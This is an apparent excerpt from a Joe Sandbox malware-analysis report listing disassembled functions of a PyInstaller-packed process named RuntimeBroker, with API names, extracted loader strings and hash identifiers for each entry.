                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                • API String ID: 190572456-3427451314
                                                                                                                                                                                • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                • Instruction ID: efbe7913ad2460dc7cbf451e4ce74f8dff6f659b493cfbaebe158866d6030a7e
                                                                                                                                                                                • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                • Instruction Fuzzy Hash: D6E195A4A1AB43A0EA77BB5CAC941B4E3A5FF04750FC45135C80E126B4EF3CF549AB60
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9
                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF72B057C97,?,?,FFFFFFFF,00007FF72B053834), ref: 00007FF72B05782C
                                                                                                                                                                                  • Part of subcall function 00007FF72B0526C0: MessageBoxW.USER32 ref: 00007FF72B052736
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                • Instruction ID: c8da6068e1258ae80fbd9bff6dbba274081ee91406ed979adb3213b7776bcad5
                                                                                                                                                                                • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                • Instruction Fuzzy Hash: 10417061B2864281FA72BB2CDC916FAE251FF84784FC44435DA4E42AB5EE2CF5049F70
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                • Instruction ID: d3ece5d01bbbb18aa78b8ac3ae954657df6fdaa7de3286a86073c4a7a856e066
                                                                                                                                                                                • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                • Instruction Fuzzy Hash: 635109266047A186D6349F26E4581BAF7A1FB98B61F404135EFDE43794DF3CD085DB20
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                • Instruction ID: 280eb9b12fd52c87f133b4339c7fa31cd01d1114902cf1707a0b0a73453dd947
                                                                                                                                                                                • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A129031B0824B86FB36BB19D95427DE651FB48750FD4413AE789466E6EF3CE9808F20
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                • Instruction ID: d23e6f81f4635485ad61dec4e4781a4c61a9f2389b2a0e2181bc2c83a5edb76a
                                                                                                                                                                                • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                • Instruction Fuzzy Hash: 44128471F4C14386FB35BB18D894A79E261FB94754FC88039E699466E4EF7CE4808F60
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                • API String ID: 2030045667-3659356012
                                                                                                                                                                                • Opcode ID: 871c4bd2f4272e85d2d648aab4226352bff6886030e1b1dfdb0960b12b81affd
                                                                                                                                                                                • Instruction ID: 66492195f0ef10e113b8ef074408a1253e2f3314250ab292c40fd796f3e19c80
                                                                                                                                                                                • Opcode Fuzzy Hash: 871c4bd2f4272e85d2d648aab4226352bff6886030e1b1dfdb0960b12b81affd
                                                                                                                                                                                • Instruction Fuzzy Hash: FC41AF21B0864642EA32BB1AAC905BAE390FF44BC4FC44031DD4D47BB5EE3CE8458B24
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                • API String ID: 2030045667-3659356012
                                                                                                                                                                                • Opcode ID: ba58478d193cca447d1da911b598277bf25201e271742bc4703496163cb40152
                                                                                                                                                                                • Instruction ID: cc7eb8a895af5d21d6c8d2f38b358e7b3d4252bfbe6d0cc80e57d439a4af5606
                                                                                                                                                                                • Opcode Fuzzy Hash: ba58478d193cca447d1da911b598277bf25201e271742bc4703496163cb40152
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B416121B0864281EA32BB19AC915BAE390FF487D4FD44431DE4D47EB5EE3CE9459F10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                • Instruction ID: e48fad1f0e5b5b7ef7c7672a152cc725cef7ad8491b71f53b0e99254011291a5
                                                                                                                                                                                • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                • Instruction Fuzzy Hash: C6D19632A0874186EB31AB69D8C03ADB7A4FB55788F504235DE8D57FA5DF38E491CB20
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF72B06E3BA,?,?,-00000018,00007FF72B06A063,?,?,?,00007FF72B069F5A,?,?,?,00007FF72B06524E), ref: 00007FF72B06E19C
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF72B06E3BA,?,?,-00000018,00007FF72B06A063,?,?,?,00007FF72B069F5A,?,?,?,00007FF72B06524E), ref: 00007FF72B06E1A8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                • Instruction ID: c29af694b380f90edae54ea361c0482262d6b7f358b6779e58d424d0fe77a646
                                                                                                                                                                                • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                • Instruction Fuzzy Hash: 7C41D531B1570281FA37AB1AAC14676A391FF49B90FC84539DE0D4B7B4EE3CE5459B20
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D06D
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D07B
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D0A5
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D113
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D11F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                • Instruction ID: df023e2298bdeeb8481cb12f4e837c6c823218dad9533ba20b80511e0983d0da
                                                                                                                                                                                • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                • Instruction Fuzzy Hash: 2E31932161A646D1EE33BB5AAC54B79A394FF04B60FD91636DD1D07B60EE3CE4428B30
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                • Opcode ID: b7fe2b7561df6cd4c7c1d854bd8c4ee8707a2c1e4b543b2cdc9668ec51387f6f
                                                                                                                                                                                • Instruction ID: cb6f89516d80d5f9613f13bc08ebc82a260d38583f06ac38178ceab5761d2cf3
                                                                                                                                                                                • Opcode Fuzzy Hash: b7fe2b7561df6cd4c7c1d854bd8c4ee8707a2c1e4b543b2cdc9668ec51387f6f
                                                                                                                                                                                • Instruction Fuzzy Hash: 16210E20B0825242FA7B732E5D99179E182DF8C7B0F944638D93E06AF6DD2CE4414E21
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                • Instruction ID: 48a4d459991f99ea64e03fd754b3860bcf394cf5b6e836a4b0acdd0f1642a9d2
                                                                                                                                                                                • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                • Instruction Fuzzy Hash: B5118431B18A4186E7619B5AEC54335E3A0FB58BE4F804234DA1D477B4DF3CE504CB50
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A5E7
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A61D
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A64A
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A65B
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A66C
                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A687
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                • Opcode ID: 7696e44328a1602cd582e56c236ae7bac79167df8c45cc5896bb346a15a7f285
                                                                                                                                                                                • Instruction ID: 5154325346bcd13582cde51b916ee0997c9659df550ba03f4b500074696e9fc0
                                                                                                                                                                                • Opcode Fuzzy Hash: 7696e44328a1602cd582e56c236ae7bac79167df8c45cc5896bb346a15a7f285
                                                                                                                                                                                • Instruction Fuzzy Hash: 77113B20F0824246FA76772E5E95139E142DF5C7B0F845738E93E066F6DE2CE4814F21
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                • Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                                • Instruction ID: b523bfab92ddce5909999e6465ec525f404d981f6fbb7e028b73b5c6873eeaff
                                                                                                                                                                                • Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                                • Instruction Fuzzy Hash: 28316572609A8285EB35EF65EC552F9A360FF89794F840135EA4D4BB69DF3CD104CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
